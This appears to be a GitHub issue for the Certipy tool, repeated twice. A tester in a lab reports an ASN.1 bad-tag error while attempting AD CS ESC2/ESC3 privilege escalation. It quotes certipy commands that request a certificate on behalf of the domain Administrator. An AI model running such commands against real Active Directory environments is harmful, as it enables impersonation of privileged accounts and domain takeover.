I am building an environment to test ESC2 and ESC3. I have an AD CS template with EKU "Any purpose" setup as well as the default "User" template published.
First off i'll fetch the "Any purpose" EKU (ESC2/3) template:
Then i'll use that pfx to sign a new CSR and apply for a client authentication certificate via the default template User on behalt of the Administrator.
/usr/local/bin/certipy req -u test@domain.local -p ******** -ca test-corp-CA01-CA -template User -on-behalf-of 'DOMAIN\Administrator' -target-ip x.x.x.x -dc-ip x.x.x.x. -pfx test.pfx
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
[*] Request ID is 114
Would you like to save the private key? (y/N)
I get the same error when i try to renew the initial test.pfx certificate.
/usr/local/bin/certipy req -renew -u test@domain.local -p ******** -ca test-corp-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x -pfx test.pfx
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
[*] Request ID is 115
Would you like to save the private key? (y/N)
The ESC2/3 privesc works fine from certify.exe from a domain joined windows box.
Hello,
I am building an environment to test ESC2 and ESC3. I have an AD CS template with EKU "Any purpose" setup as well as the default "User" template published.
First off i'll fetch the "Any purpose" EKU (ESC2/3) template:
Then i'll use that pfx to sign a new CSR and apply for a client authentication certificate via the default template
User
on behalt of the Administrator.I get the same error when i try to renew the initial test.pfx certificate.
The ESC2/3 privesc works fine from
certify.exe
from a domain joined windows box.I have tried to figure out which ASN.1 tag in https://github.com/ly4k/Certipy/blob/main/certipy/lib/certificate.py#L525 that might be wrong however i'm not successful.
I'm on the latest
92592c59acf50e5db3ace2947680614c110aff82
commit.